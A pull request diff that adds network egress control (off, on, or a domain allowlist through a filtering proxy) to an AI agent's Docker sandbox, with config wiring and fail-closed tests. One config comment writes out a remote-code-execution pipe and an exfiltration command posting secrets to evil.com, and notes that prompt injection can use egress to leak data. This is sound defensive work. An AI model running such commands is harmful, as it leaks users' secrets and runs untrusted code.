### PR TITLE
feat(docker): sandbox egress control (on/off/allowlist) with filtered proxy

### DIFF
--- a/cli-config.yaml.example
+++ b/cli-config.yaml.example
@@ -326,6 +326,10 @@ terminal:
   #   "allowlist" - HTTP(S) only, routed through a domain-filtered proxy on an
   #                 internal network; raw/non-proxied egress has no route out.
   # Any other value fails closed to "off" (a typo never grants full network).
+  # Scope: this controls Hermes' Docker terminal backend only. The Codex
+  # app-server runtime executes in Codex's own sandbox and is not covered by
+  # this Docker allowlist; use Codex's network policy or `/codex-runtime auto`
+  # when this allowlist is a required boundary.
   container_network: "on"
   # Domains reachable in "allowlist" mode (no scheme/path; leading "*." wildcard ok;
   # IP literals must match exactly). Empty list + allowlist mode = deny-all.

--- a/cli-config.yaml.example
+++ b/cli-config.yaml.example
@@ -315,6 +315,32 @@ terminal:
   container_memory: 5120        # Memory in MB (5120 = 5GB)
   container_disk: 51200         # Disk in MB (51200 = 50GB)
   container_persistent: true    # Persist filesystem across sessions (false = ephemeral)
+  #
+  # --- Sandbox egress control (docker backend) ---
+  # SECURITY: the approval gate (tools/approval.py) blocks destructive commands and
+  # remote-code-execution (`curl ... | sh`), but does NOT block outbound data
+  # exfiltration (`curl -X POST evil.com -d @secret`). Network egress is the channel
+  # a prompt-injection would use to leak data. Restrict it for untrusted workloads.
+  #   "on"        - full network (default, current behavior)
+  #   "off"       - no network at all (--network=none)
+  #   "allowlist" - HTTP(S) only, routed through a domain-filtered proxy on an
+  #                 internal network; raw/non-proxied egress has no route out.
+  # Any other value fails closed to "off" (a typo never grants full network).
+  container_network: "on"
+  # Domains reachable in "allowlist" mode (no scheme/path; leading "*." wildcard ok;
+  # IP literals must match exactly). Empty list + allowlist mode = deny-all.
+  # Example below allows package installs + git:
+  # container_network: "allowlist"
+  # container_network_allowlist:
+  #   - "pypi.org"
+  #   - "files.pythonhosted.org"
+  #   - "registry.npmjs.org"
+  #   - "github.com"
+  #   - "objects.githubusercontent.com"
+  #
+  # The proxy container/network (label "hermes.egress") is shared per-allowlist
+  # and pruned automatically when no sandbox uses it. Manual cleanup:
+  #   docker ps -a --filter label=hermes.egress   /   docker network ls --filter label=hermes.egress
 
 # -----------------------------------------------------------------------------
 # SUDO SUPPORT (works with ALL backends above)

--- a/cli.py
+++ b/cli.py
@@ -630,6 +630,8 @@ def load_cli_config() -> Dict[str, Any]:
         "docker_volumes": "TERMINAL_DOCKER_VOLUMES",
         "docker_env": "TERMINAL_DOCKER_ENV",
         "docker_extra_args": "TERMINAL_DOCKER_EXTRA_ARGS",
+        "container_network": "TERMINAL_CONTAINER_NETWORK",
+        "container_network_allowlist": "TERMINAL_CONTAINER_NETWORK_ALLOWLIST",
         "docker_mount_cwd_to_workspace": "TERMINAL_DOCKER_MOUNT_CWD_TO_WORKSPACE",
         "docker_network": "TERMINAL_DOCKER_NETWORK",
         "docker_run_as_host_user": "TERMINAL_DOCKER_RUN_AS_HOST_USER",

--- a/gateway/run.py
+++ b/gateway/run.py
@@ -1587,6 +1587,8 @@ if _config_path.exists():
                 "docker_run_as_host_user": "TERMINAL_DOCKER_RUN_AS_HOST_USER",
                 "docker_persist_across_processes": "TERMINAL_DOCKER_PERSIST_ACROSS_PROCESSES",
                 "docker_orphan_reaper": "TERMINAL_DOCKER_ORPHAN_REAPER",
+                "container_network": "TERMINAL_CONTAINER_NETWORK",
+                "container_network_allowlist": "TERMINAL_CONTAINER_NETWORK_ALLOWLIST",
                 "sandbox_dir": "TERMINAL_SANDBOX_DIR",
                 "persistent_shell": "TERMINAL_PERSISTENT_SHELL",
             }

--- a/hermes_cli/config.py
+++ b/hermes_cli/config.py
@@ -1233,6 +1233,13 @@ DEFAULT_CONFIG = {
         "container_memory": 5120,       # MB (default 5GB)
         "container_disk": 51200,        # MB (default 50GB)
         "container_persistent": True,   # Persist filesystem across sessions
+        # Sandbox egress control (docker backend): "on" = full network (default),
+        # "off" = no network (--network=none), "allowlist" = HTTP(S) only through a
+        # domain-filtered proxy on an internal network (blocks arbitrary exfiltration).
+        "container_network": "on",
+        # Domains reachable in "allowlist" mode (no scheme/path; "*." wildcard ok).
+        # Empty list with allowlist mode means deny-all egress.
+        "container_network_allowlist": [],
         # Docker volume mounts — share host directories with the container.
         # Each entry is "host_path:container_path" (standard Docker -v syntax).
         # Example:
@@ -7058,6 +7065,8 @@ TERMINAL_CONFIG_ENV_MAP = {
     "docker_run_as_host_user": "TERMINAL_DOCKER_RUN_AS_HOST_USER",
     "docker_persist_across_processes": "TERMINAL_DOCKER_PERSIST_ACROSS_PROCESSES",
     "docker_orphan_reaper": "TERMINAL_DOCKER_ORPHAN_REAPER",
+    "container_network": "TERMINAL_CONTAINER_NETWORK",
+    "container_network_allowlist": "TERMINAL_CONTAINER_NETWORK_ALLOWLIST",
     "sandbox_dir": "TERMINAL_SANDBOX_DIR",
     "persistent_shell": "TERMINAL_PERSISTENT_SHELL",
 }
@@ -8191,6 +8200,13 @@ def show_config():
     
     if terminal.get('backend') == 'docker':
         print(f"  Docker image: {terminal.get('docker_image', 'nikolaik/python-nodejs:python3.11-nodejs20')}")
+        network = terminal.get('container_network', 'on')
+        if network == 'allowlist':
+            allowlist = terminal.get('container_network_allowlist', []) or []
+            print(f"  Egress:       allowlist ({len(allowlist)} domain(s))" if allowlist
+                  else f"  Egress:       allowlist {color('(empty = deny-all)', Colors.DIM)}")
+        else:
+            print(f"  Egress:       {network}")
     elif terminal.get('backend') == 'singularity':
         print(f"  Image:        {terminal.get('singularity_image', 'docker://nikolaik/python-nodejs:python3.11-nodejs20')}")
     elif terminal.get('backend') == 'modal':

--- a/scripts/release.py
+++ b/scripts/release.py
@@ -2020,6 +2020,7 @@ AUTHOR_MAP = {
     "1torhan@protonmail.com": "uzaylisak",  # PR #29988 salvage (detect_local_server_type process-lifetime cache)
     "zhchl@hermes-agent.local": "8294",  # PR #50572 salvage (honor config context_length on banner)
     "yansh2017@gmail.com": "ya-nsh",  # PR #26790 salvage (normalize local terminal relative cwd; #26783)
+    "s.suzuki784@hotmail.com": "suzu784",  # sandbox egress control / kanban empty-diff guard PRs
 }
 
 

--- a/tests/gateway/test_config_env_bridge_authority.py
+++ b/tests/gateway/test_config_env_bridge_authority.py
@@ -48,6 +48,8 @@ def _run_gateway_import(hermes_home: Path, initial_env: dict[str, str]) -> dict[
             "HERMES_GATEWAY_BUSY_TEXT_MODE",
             "HERMES_GATEWAY_PLATFORM_CONNECT_TIMEOUT",
             "HERMES_TIMEZONE",
+            "TERMINAL_CONTAINER_NETWORK",
+            "TERMINAL_CONTAINER_NETWORK_ALLOWLIST",
         ):
             v = os.environ.get(k)
             if v is not None:
@@ -82,7 +84,8 @@ def _run_gateway_import(hermes_home: Path, initial_env: dict[str, str]) -> dict[
 
 
 def _write_config(home: Path, agent_cfg: dict | None = None, display_cfg: dict | None = None,
-                  timezone: str | None = None, gateway_cfg: dict | None = None) -> None:
+                  timezone: str | None = None, gateway_cfg: dict | None = None,
+                  terminal_cfg: dict | None = None) -> None:
     import yaml
     cfg: dict = {}
     if agent_cfg:
@@ -91,6 +94,8 @@ def _write_config(home: Path, agent_cfg: dict | None = None, display_cfg: dict |
         cfg["display"] = display_cfg
     if gateway_cfg:
         cfg["gateway"] = gateway_cfg
+    if terminal_cfg:
+        cfg["terminal"] = terminal_cfg
     if timezone:
         cfg["timezone"] = timezone
     (home / "config.yaml").write_text(yaml.safe_dump(cfg))
@@ -188,6 +193,39 @@ def test_config_platform_connect_timeout_supplies_env_when_unset(hermes_home: Pa
     env = _run_gateway_import(hermes_home, initial_env={})
 
     assert env.get("HERMES_GATEWAY_PLATFORM_CONNECT_TIMEOUT") == "90"
+
+
+def test_gateway_bridge_exports_egress_env_vars(hermes_home: Path) -> None:
+    """terminal.container_network* must cross the import-time bridge into the
+    env vars terminal_tool._get_env_config() reads, JSON-encoding the list.
+
+    The egress sandbox layer once shipped fully unit-tested but inert because
+    the startup bridges never mapped these keys — this drives the real bridge
+    instead of asserting on source text."""
+    _write_config(hermes_home, terminal_cfg={
+        "backend": "docker",
+        "container_network": "allowlist",
+        "container_network_allowlist": ["github.com", "pypi.org"],
+    })
+
+    env = _run_gateway_import(hermes_home, initial_env={})
+
+    assert env.get("TERMINAL_CONTAINER_NETWORK") == "allowlist"
+    assert env.get("TERMINAL_CONTAINER_NETWORK_ALLOWLIST") == '["github.com", "pypi.org"]'
+
+
+def test_gateway_bridge_egress_config_wins_over_stale_env(hermes_home: Path) -> None:
+    """A stale .env TERMINAL_CONTAINER_NETWORK must not weaken config.yaml's
+    egress lockdown — terminal keys are config-authoritative."""
+    _write_config(hermes_home, terminal_cfg={
+        "backend": "docker",
+        "container_network": "off",
+    })
+    _write_env(hermes_home, {"TERMINAL_CONTAINER_NETWORK": "on"})
+
+    env = _run_gateway_import(hermes_home, initial_env={})
+
+    assert env.get("TERMINAL_CONTAINER_NETWORK") == "off"
 
 
 def test_env_platform_connect_timeout_wins_over_config(hermes_home: Path) -> None:

--- a/tests/tools/test_docker_environment.py
+++ b/tests/tools/test_docker_environment.py
@@ -388,14 +388,14 @@ def test_legacy_network_false_cuts_network(monkeypatch):
     assert "--network=none" in _run_args_str(calls)
 
 
-def test_network_mode_overrides_legacy_bool(monkeypatch):
-    """Explicit network_mode='on' wins even if legacy network=False is passed."""
+def test_legacy_network_false_remains_hard_deny(monkeypatch):
+    """A historical docker_network=false must not be weakened by new defaults."""
     monkeypatch.setattr(docker_env, "find_docker", lambda: "/usr/bin/docker")
     calls = _mock_subprocess_run(monkeypatch)
 
     _make_dummy_env(network=False, network_mode="on")
 
-    assert "--network=none" not in _run_args_str(calls)
+    assert "--network=none" in _run_args_str(calls)
 
 
 def test_allowlist_mode_uses_proxy_network_and_env(monkeypatch):
@@ -436,6 +436,8 @@ def test_resolve_network_mode():
     """_resolve_network_mode precedence and fail-closed behavior."""
     assert docker_env._resolve_network_mode(None, True) == "on"
     assert docker_env._resolve_network_mode(None, False) == "off"
+    assert docker_env._resolve_network_mode("on", False) == "off"
+    assert docker_env._resolve_network_mode("allowlist", False) == "off"
     assert docker_env._resolve_network_mode("off", True) == "off"
     assert docker_env._resolve_network_mode("ALLOWLIST", True) == "allowlist"
     # A typo in an egress-control setting must never grant full network.

--- a/tests/tools/test_docker_environment.py
+++ b/tests/tools/test_docker_environment.py
@@ -808,8 +808,22 @@ def test_labels_attribute_populated_after_init(monkeypatch):
 # ── Cross-process container reuse (issue #20561) ──────────────────
 
 
+def _network_mode_inspect_result(cmd, network_mode_response: str | None):
+    """CompletedProcess for the reuse guard's NetworkMode inspect probe.
+
+    ``None`` simulates a failed inspect (rc 1); anything else is returned
+    as the container's HostConfig.NetworkMode.
+    """
+    if network_mode_response is None:
+        return subprocess.CompletedProcess(cmd, 1, stdout="", stderr="no such object")
+    return subprocess.CompletedProcess(
+        cmd, 0, stdout=f"{network_mode_response}\n", stderr="",
+    )
+
+
 def _mock_subprocess_run_with_reuse(monkeypatch, ps_state: str | None,
-                                     start_succeeds: bool = True):
+                                     start_succeeds: bool = True,
+                                     network_mode_response: str | None = None):
     """Reuse-aware subprocess.run mock.
 
     ``ps_state`` controls what ``docker ps -a --filter ...`` returns:
@@ -818,6 +832,13 @@ def _mock_subprocess_run_with_reuse(monkeypatch, ps_state: str | None,
         path picks it up. ``"running"`` skips ``docker start``; other states
         trigger ``docker start`` (which can be forced to fail via
         ``start_succeeds=False``).
+
+    ``network_mode_response`` controls what ``docker inspect --format
+    {{.HostConfig.NetworkMode}}`` (the reuse network guard probe) returns:
+      * ``None`` (default) → inspect fails (rc 1). The guard treats an
+        unknown mode as "keep" under mode ``on`` and "replace" under
+        lockdown, so existing on-mode reuse tests are unaffected.
+      * ``"bridge"`` / ``"none"`` / ``"hermes-egress-..."`` → that mode
 
     Returns the captured call list so the test can verify which docker
     commands actually ran.
@@ -836,6 +857,8 @@ def _mock_subprocess_run_with_reuse(monkeypatch, ps_state: str | None,
                 return subprocess.CompletedProcess(
                     cmd, 0, stdout=f"reused-cid\t{ps_state}\n", stderr="",
                 )
+            if sub == "inspect" and "{{.HostConfig.NetworkMode}}" in cmd:
+                return _network_mode_inspect_result(cmd, network_mode_response)
             if sub == "start":
                 if not start_succeeds:
                     # Real subprocess.run with check=True raises on non-zero exit;
@@ -915,6 +938,159 @@ def test_reuse_falls_back_to_fresh_run_when_start_fails(monkeypatch):
     )
     run_invocations = [c for c in calls if isinstance(c[0], list) and len(c[0]) >= 2 and c[0][1] == "run"]
     assert run_invocations, "fallback to fresh docker run must happen on start failure"
+
+
+# ── Reuse network guard across egress modes ────────────────────────
+#
+# Label-only reuse must not hand out a container whose network contradicts
+# the current ``container_network`` config (a stale bridge container under
+# "off"/"allowlist" would silently defeat the lockdown).
+
+
+def _sub_calls(calls, sub):
+    return [c for c in calls if isinstance(c[0], list) and len(c[0]) >= 2 and c[0][1] == sub]
+
+
+def _patch_egress_proxy(monkeypatch, network="hermes-egress-test"):
+    class _Proxy:
+        proxy_env = {"HTTP_PROXY": "http://hermes-egress-proxy:8888"}
+
+    _Proxy.network = network
+    import tools.environments.egress_proxy as ep
+    monkeypatch.setattr(ep, "ensure_allowlisted_network", lambda allowlist: _Proxy())
+
+
+def _guard_env(monkeypatch, network_mode_response, **env_kwargs):
+    monkeypatch.setattr(docker_env, "find_docker", lambda: "/usr/bin/docker")
+    monkeypatch.setattr(docker_env, "_get_active_profile_name", lambda: "default")
+    calls = _mock_subprocess_run_with_reuse(
+        monkeypatch, ps_state="running", network_mode_response=network_mode_response,
+    )
+    env = _make_dummy_env(**env_kwargs)
+    return env, calls
+
+
+def test_reuse_guard_off_removes_networked_container(monkeypatch):
+    """Mode "off" must replace a reusable container still on a bridge network."""
+    env, calls = _guard_env(
+        monkeypatch, "bridge", task_id="guard-off-bridge", network_mode="off",
+    )
+
+    assert _sub_calls(calls, "rm"), "stale bridge container must be removed under mode off"
+    assert env._container_id == "fresh-cid"
+
+
+def test_reuse_guard_off_keeps_airgapped_container(monkeypatch):
+    """Mode "off" reuses a container that is already air-gapped."""
+    env, calls = _guard_env(
+        monkeypatch, "none", task_id="guard-off-none", network_mode="off",
+    )
+
+    assert not _sub_calls(calls, "rm")
+    assert not _sub_calls(calls, "run")
+    assert env._container_id == "reused-cid"
+
+
+def test_reuse_guard_legacy_network_false_still_enforced(monkeypatch):
+    """Backward compat: docker_network=false keeps its bridge-replacement guard."""
+    env, calls = _guard_env(
+        monkeypatch, "bridge", task_id="guard-legacy-false",
+        network=False, network_mode=None,
+    )
+
+    assert _sub_calls(calls, "rm")
+    assert env._container_id == "fresh-cid"
+
+
+def test_reuse_guard_allowlist_removes_bridge_container(monkeypatch):
+    """Switching to allowlist mode must not reuse a full-network container."""
+    _patch_egress_proxy(monkeypatch)
+    env, calls = _guard_env(
+        monkeypatch, "bridge", task_id="guard-allow-bridge",
+        network_mode="allowlist", network_allowlist=["github.com"],
+    )
+
+    assert _sub_calls(calls, "rm"), "bridge container must be removed under allowlist mode"
+    assert env._container_id == "fresh-cid"
+    assert "--network hermes-egress-test" in _run_args_str(calls)
+
+
+def test_reuse_guard_allowlist_removes_other_allowlist_container(monkeypatch):
+    """A changed allowlist hashes to a different network — replace, don't reuse."""
+    _patch_egress_proxy(monkeypatch)
+    env, calls = _guard_env(
+        monkeypatch, "hermes-egress-0123456789", task_id="guard-allow-other",
+        network_mode="allowlist", network_allowlist=["github.com"],
+    )
+
+    assert _sub_calls(calls, "rm")
+    assert env._container_id == "fresh-cid"
+
+
+def test_reuse_guard_allowlist_keeps_matching_container(monkeypatch):
+    """Same allowlist → same egress network → container is reused as-is."""
+    _patch_egress_proxy(monkeypatch)
+    env, calls = _guard_env(
+        monkeypatch, "hermes-egress-test", task_id="guard-allow-match",
+        network_mode="allowlist", network_allowlist=["github.com"],
+    )
+
+    assert not _sub_calls(calls, "rm")
+    assert not _sub_calls(calls, "run")
+    assert env._container_id == "reused-cid"
+
+
+def test_reuse_guard_allowlist_proxy_failure_fails_closed(monkeypatch):
+    """When proxy provisioning fails the expectation drops to "none", so even
+    a container on the (now unverifiable) egress network is replaced."""
+    import tools.environments.egress_proxy as ep
+
+    def _boom(allowlist):
+        raise RuntimeError("proxy down")
+
+    monkeypatch.setattr(ep, "ensure_allowlisted_network", _boom)
+    env, calls = _guard_env(
+        monkeypatch, "hermes-egress-test", task_id="guard-allow-fail",
+        network_mode="allowlist", network_allowlist=["github.com"],
+    )
+
+    assert _sub_calls(calls, "rm")
+    assert env._container_id == "fresh-cid"
+    assert "--network=none" in _run_args_str(calls)
+
+
+def test_reuse_guard_lockdown_inspect_failure_fails_closed(monkeypatch):
+    """Under lockdown an unverifiable container (inspect fails) is replaced."""
+    env, calls = _guard_env(
+        monkeypatch, None, task_id="guard-off-unknown", network_mode="off",
+    )
+
+    assert _sub_calls(calls, "rm")
+    assert env._container_id == "fresh-cid"
+
+
+def test_reuse_guard_on_replaces_stranded_egress_container(monkeypatch):
+    """Mode "on" replaces a container stuck on an internal hermes-egress-*
+    network — it has no route out at all under an open-network config."""
+    env, calls = _guard_env(
+        monkeypatch, "hermes-egress-0123456789", task_id="guard-on-stranded",
+    )
+
+    assert _sub_calls(calls, "rm")
+    assert env._container_id == "fresh-cid"
+
+
+@pytest.mark.parametrize("existing_mode", ["bridge", "none"])
+def test_reuse_guard_on_keeps_non_egress_containers(monkeypatch, existing_mode):
+    """Mode "on" leaves bridge containers and deliberate --network=none
+    containers (docker_extra_args operators) alone — no churn."""
+    env, calls = _guard_env(
+        monkeypatch, existing_mode, task_id=f"guard-on-{existing_mode}",
+    )
+
+    assert not _sub_calls(calls, "rm")
+    assert not _sub_calls(calls, "run")
+    assert env._container_id == "reused-cid"
 
 
 def test_failed_docker_run_cleans_up_orphaned_container(monkeypatch):

--- a/tests/tools/test_docker_environment.py
+++ b/tests/tools/test_docker_environment.py
@@ -46,6 +46,8 @@ def _make_dummy_env(**kwargs):
         task_id=kwargs.get("task_id", "test-task"),
         volumes=kwargs.get("volumes", []),
         network=kwargs.get("network", True),
+        network_mode=kwargs.get("network_mode"),
+        network_allowlist=kwargs.get("network_allowlist"),
         host_cwd=kwargs.get("host_cwd"),
         auto_mount_cwd=kwargs.get("auto_mount_cwd", False),
         env=kwargs.get("env"),
@@ -342,6 +344,125 @@ def test_init_env_args_never_forwards_blank_secret(monkeypatch):
     # The key must not appear at all — not even as an empty -e MY_SECRET= flag.
     assert not any(a.startswith("MY_SECRET=") for a in args)
     assert "MY_SECRET" not in " ".join(args)
+
+
+# ── network egress mode tests ─────────────────────────────────────
+
+
+def _run_args_str(calls):
+    """Join the args of the captured `docker run` call into a single string."""
+    run_calls = [c for c in calls if isinstance(c[0], list) and len(c[0]) >= 2 and c[0][1] == "run"]
+    assert run_calls, "docker run should have been called"
+    return " ".join(run_calls[0][0])
+
+
+def test_network_on_keeps_full_network(monkeypatch):
+    """Default 'on' mode must not restrict the network."""
+    monkeypatch.setattr(docker_env, "find_docker", lambda: "/usr/bin/docker")
+    calls = _mock_subprocess_run(monkeypatch)
+
+    _make_dummy_env(network_mode="on")
+
+    args = _run_args_str(calls)
+    assert "--network=none" not in args
+    assert "--network" not in args
+
+
+def test_network_off_cuts_network(monkeypatch):
+    """'off' mode must add --network=none."""
+    monkeypatch.setattr(docker_env, "find_docker", lambda: "/usr/bin/docker")
+    calls = _mock_subprocess_run(monkeypatch)
+
+    _make_dummy_env(network_mode="off")
+
+    assert "--network=none" in _run_args_str(calls)
+
+
+def test_legacy_network_false_cuts_network(monkeypatch):
+    """Backward compat: network=False (no network_mode) still means no network."""
+    monkeypatch.setattr(docker_env, "find_docker", lambda: "/usr/bin/docker")
+    calls = _mock_subprocess_run(monkeypatch)
+
+    _make_dummy_env(network=False, network_mode=None)
+
+    assert "--network=none" in _run_args_str(calls)
+
+
+def test_network_mode_overrides_legacy_bool(monkeypatch):
+    """Explicit network_mode='on' wins even if legacy network=False is passed."""
+    monkeypatch.setattr(docker_env, "find_docker", lambda: "/usr/bin/docker")
+    calls = _mock_subprocess_run(monkeypatch)
+
+    _make_dummy_env(network=False, network_mode="on")
+
+    assert "--network=none" not in _run_args_str(calls)
+
+
+def test_allowlist_mode_uses_proxy_network_and_env(monkeypatch):
+    """'allowlist' mode attaches the internal proxy network and injects proxy env."""
+    monkeypatch.setattr(docker_env, "find_docker", lambda: "/usr/bin/docker")
+    calls = _mock_subprocess_run(monkeypatch)
+
+    class _Proxy:
+        network = "hermes-egress-test"
+        proxy_env = {"HTTP_PROXY": "http://hermes-egress-proxy:8888"}
+
+    import tools.environments.egress_proxy as ep
+    monkeypatch.setattr(ep, "ensure_allowlisted_network", lambda allowlist: _Proxy())
+
+    _make_dummy_env(network_mode="allowlist", network_allowlist=["github.com"])
+
+    args = _run_args_str(calls)
+    assert "--network hermes-egress-test" in args
+    assert "HTTP_PROXY=http://hermes-egress-proxy:8888" in args
+
+
+def test_allowlist_mode_fails_closed_when_proxy_unavailable(monkeypatch):
+    """If the egress proxy can't be set up, fall back to no network (not open)."""
+    monkeypatch.setattr(docker_env, "find_docker", lambda: "/usr/bin/docker")
+    calls = _mock_subprocess_run(monkeypatch)
+
+    import tools.environments.egress_proxy as ep
+    def _boom(allowlist):
+        raise RuntimeError("proxy down")
+    monkeypatch.setattr(ep, "ensure_allowlisted_network", _boom)
+
+    _make_dummy_env(network_mode="allowlist", network_allowlist=["github.com"])
+
+    assert "--network=none" in _run_args_str(calls)
+
+
+def test_resolve_network_mode():
+    """_resolve_network_mode precedence and fail-closed behavior."""
+    assert docker_env._resolve_network_mode(None, True) == "on"
+    assert docker_env._resolve_network_mode(None, False) == "off"
+    assert docker_env._resolve_network_mode("off", True) == "off"
+    assert docker_env._resolve_network_mode("ALLOWLIST", True) == "allowlist"
+    # A typo in an egress-control setting must never grant full network.
+    assert docker_env._resolve_network_mode("bogus", True) == "off"  # fail-closed
+    assert docker_env._resolve_network_mode("", False) == "off"
+
+
+def test_normalize_allowlist():
+    """_normalize_allowlist cleans, validates, and dedupes hosts."""
+    result = docker_env._normalize_allowlist([
+        "GitHub.com",                  # lowercased
+        "https://pypi.org/simple/",    # scheme + path stripped
+        "registry.npmjs.org:443",      # port stripped
+        "*.githubusercontent.com",     # wildcard ok
+        "github.com",                  # dedupe
+        "bad host",                    # space -> invalid
+        123,                           # non-string -> dropped
+        "",                            # empty -> dropped
+    ])
+    assert result == [
+        "github.com",
+        "pypi.org",
+        "registry.npmjs.org",
+        "*.githubusercontent.com",
+    ]
+    assert docker_env._normalize_allowlist(None) == []
+    assert docker_env._normalize_allowlist("not-a-list") == []
 
 
 # ── docker_env tests ──────────────────────────────────────────────

--- a/tests/tools/test_docker_network_config.py
+++ b/tests/tools/test_docker_network_config.py
@@ -169,11 +169,25 @@ def test_reuse_keeps_airgapped_container_when_lockdown_requested(monkeypatch):
     assert not any(cmd[1] == "run" for cmd in commands), "matching container must be reused"
 
 
-def test_reuse_skips_inspect_when_network_enabled(monkeypatch):
+def test_reuse_keeps_airgapped_container_when_network_enabled(monkeypatch):
     commands = _reuse_guard_harness(monkeypatch, existing_mode="none", network=True)
 
-    # Default-network config never churns containers, even air-gapped ones
-    # (operators may have created them via docker_extra_args).
-    assert not any(cmd[1] == "inspect" for cmd in commands)
+    # Default-network config never churns deliberately air-gapped containers
+    # (operators may have created them via docker_extra_args). The guard now
+    # inspects NetworkMode in every mode — so it can replace containers
+    # stranded on a hermes-egress-* network — but under "on" the inspect
+    # result must only ever lead to removal for those egress networks.
     assert not any(cmd[1] == "rm" for cmd in commands)
     assert not any(cmd[1] == "run" for cmd in commands)
+
+
+def test_reuse_replaces_stranded_egress_container_when_network_enabled(monkeypatch):
+    commands = _reuse_guard_harness(
+        monkeypatch, existing_mode="hermes-egress-0123456789", network=True,
+    )
+
+    # A container left on an internal egress network has no route out at all
+    # under an open-network config — replace it instead of reusing a sandbox
+    # that silently cannot reach the network.
+    assert any(cmd[1:3] == ["rm", "-f"] for cmd in commands)
+    assert any(cmd[1] == "run" for cmd in commands)

--- a/tests/tools/test_egress_proxy.py
+++ b/tests/tools/test_egress_proxy.py
@@ -6,7 +6,6 @@ import socket
 import subprocess
 import threading
 from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
-from pathlib import Path
 
 import pytest
 
@@ -403,6 +402,20 @@ def test_proxy_returns_502_when_upstream_unreachable():
     assert resp.split(b"\r\n", 1)[0].split(b" ")[1] == b"502"
 
 
+def test_expected_network_name_matches_provisioning():
+    """expected_network_name must be pure and agree with the provisioning
+    naming (same canonicalization + hash), so the Docker reuse guard can
+    validate a persisted container without touching docker."""
+    assert egress_proxy.expected_network_name(["B.com", " a.com "]) == (
+        egress_proxy.expected_network_name(["a.com", "b.com"])
+    )
+    name = egress_proxy.expected_network_name(["github.com"])
+    assert name.startswith(egress_proxy.EGRESS_NETWORK_PREFIX)
+    assert name == egress_proxy._names(["github.com"])[0]
+    # Different allowlists must map to different networks (stale-container detection).
+    assert name != egress_proxy.expected_network_name(["pypi.org"])
+
+
 # ── config wiring: the settings must actually reach the sandbox layer ──
 
 
@@ -426,17 +439,117 @@ def test_get_env_config_egress_defaults(monkeypatch):
     assert cfg["container_network_allowlist"] == []
 
 
-def test_startup_bridges_map_egress_env_vars():
-    """Regression guard for the config.yaml → env-var bridge.
+# ── creation paths: all three sandbox creators must wire egress settings ──
+
+
+def _drive_creation_path(monkeypatch, invoke):
+    """Run *invoke* with egress env vars set and ``_DockerEnvironment`` faked,
+    returning the kwargs that actually reached the DockerEnvironment class.
+
+    Exercises the real ``_get_env_config()`` → ``container_config`` →
+    ``_create_environment`` chain, so a creation path that drops the egress
+    keys from its ``container_config`` dict fails here with
+    ``network_mode=None`` instead of shipping a full-network sandbox.
+    """
+    import tools.terminal_tool as tt
+
+    captured = {}
+
+    class _DummyEnv:
+        cwd = "/root"
+        cwd_owner = None
+
+        def execute(self, *args, **kwargs):
+            return {"output": "", "exit_code": 0}
+
+    def _fake_docker_env(**kwargs):
+        captured.update(kwargs)
+        return _DummyEnv()
+
+    monkeypatch.setenv("TERMINAL_ENV", "docker")
+    monkeypatch.setenv("TERMINAL_CONTAINER_NETWORK", "allowlist")
+    monkeypatch.setenv("TERMINAL_CONTAINER_NETWORK_ALLOWLIST", '["github.com"]')
+    monkeypatch.delenv("TERMINAL_CWD", raising=False)
+    monkeypatch.setattr(tt, "_DockerEnvironment", _fake_docker_env)
+    monkeypatch.setattr(tt, "_maybe_reap_docker_orphans", lambda cc: None)
+    monkeypatch.setattr(tt, "_start_cleanup_thread", lambda: None)
+    monkeypatch.setattr(tt, "_active_environments", {})
+    monkeypatch.setattr(tt, "_last_activity", {})
+    invoke()
+    assert captured, "creation path never reached DockerEnvironment"
+    return captured
+
+
+def test_terminal_path_egress_reaches_docker_environment(monkeypatch):
+    import tools.terminal_tool as tt
+
+    captured = _drive_creation_path(
+        monkeypatch,
+        lambda: tt.terminal_tool(command="pwd", task_id="egress-term", force=True),
+    )
+    assert captured["network_mode"] == "allowlist"
+    assert captured["network_allowlist"] == ["github.com"]
+
+
+def test_code_execution_path_egress_reaches_docker_environment(monkeypatch):
+    from tools.code_execution_tool import _get_or_create_env
+
+    captured = _drive_creation_path(
+        monkeypatch, lambda: _get_or_create_env("egress-exec"),
+    )
+    assert captured["network_mode"] == "allowlist"
+    assert captured["network_allowlist"] == ["github.com"]
+
+
+def test_file_tools_path_egress_reaches_docker_environment(monkeypatch):
+    import tools.file_tools as ft
+
+    monkeypatch.setattr(ft, "_file_ops_cache", {})
+    monkeypatch.setattr(ft, "_last_known_cwd", {})
+    captured = _drive_creation_path(
+        monkeypatch, lambda: ft._get_file_ops("egress-files"),
+    )
+    assert captured["network_mode"] == "allowlist"
+    assert captured["network_allowlist"] == ["github.com"]
+
+
+def test_cli_bridge_exports_egress_env_vars(tmp_path, monkeypatch):
+    """Regression guard for the config.yaml → env-var bridge (CLI startup).
 
     The sandbox layer once shipped fully unit-tested but inert, because the
-    two startup maps below never bridged container_network*. They are local
-    dicts inside functions, so assert on the source directly.
+    startup bridges never mapped container_network*. Drive the real
+    ``cli.load_cli_config()`` and assert the env vars terminal_tool reads
+    actually get set (the gateway bridge has its own behavioral test in
+    tests/gateway/test_config_env_bridge_authority.py).
     """
-    repo = Path(__file__).resolve().parents[2]
-    for rel in ("cli.py", "gateway/run.py"):
-        src = (repo / rel).read_text(encoding="utf-8")
-        assert '"container_network": "TERMINAL_CONTAINER_NETWORK"' in src, rel
-        assert (
-            '"container_network_allowlist": "TERMINAL_CONTAINER_NETWORK_ALLOWLIST"' in src
-        ), rel
+    import json
+    import os
+    from unittest import mock
+
+    import yaml
+
+    import cli
+
+    hermes_home = tmp_path / ".hermes"
+    hermes_home.mkdir()
+    (hermes_home / "config.yaml").write_text(yaml.safe_dump({
+        "terminal": {
+            "backend": "docker",
+            "container_network": "allowlist",
+            "container_network_allowlist": ["github.com", "pypi.org"],
+        },
+    }))
+
+    # load_cli_config bridges many terminal keys into os.environ; snapshot
+    # and restore the whole environment so nothing leaks into other tests.
+    with mock.patch.dict(os.environ):
+        os.environ["HERMES_HOME"] = str(hermes_home)
+        os.environ.pop("TERMINAL_CONTAINER_NETWORK", None)
+        os.environ.pop("TERMINAL_CONTAINER_NETWORK_ALLOWLIST", None)
+        monkeypatch.setattr(cli, "_hermes_home", hermes_home)
+        cli.load_cli_config()
+
+        assert os.environ["TERMINAL_CONTAINER_NETWORK"] == "allowlist"
+        assert json.loads(os.environ["TERMINAL_CONTAINER_NETWORK_ALLOWLIST"]) == [
+            "github.com", "pypi.org",
+        ]

--- a/tests/tools/test_egress_proxy.py
+++ b/tests/tools/test_egress_proxy.py
@@ -1,0 +1,442 @@
